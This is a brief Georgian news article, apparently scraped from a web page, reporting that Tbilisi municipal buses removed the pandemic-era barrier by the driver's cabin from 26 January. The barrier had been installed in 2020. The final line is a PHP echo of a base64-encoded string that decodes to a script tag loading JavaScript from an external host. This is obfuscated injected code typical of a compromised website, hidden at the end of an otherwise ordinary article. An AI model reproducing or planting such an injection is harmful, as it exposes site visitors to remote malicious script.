celsiusi
ავერსი საქკაბელი
თბილისის მუნიციპალურ ავტობუსებში მძღოლის კაბინასთან განთავსებული ბარიერი მოიხსნა. შესაბამისად, მგზავრებს ავტობუსებში ასვლა უკვე წინა კარიდანაც შეუძლიათ.
 
მერიის პრესსამსახურის განცხადებით, ზემოხსენებული შეზღუდვის მოხსნის წინადადებით უწყებათაშორის საბჭოს ქალაქის მთავრობამ  მიმართა, რასაც საბჭო დაეთანხმა. შედეგად, 26 იანვრიდან ბარიერი მოხსნეს.
 
თბილისის ავტობუსების წინა ნაწილში ბარიერი 2020 წელს, პანდემიის კრიზისის დაწყებიდან მალევე განათავსეს. შეზღუდვის მიზანი მძღოლისა და მგზავრების ერთმანეთისგან დისტანცირება იყო.
896
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");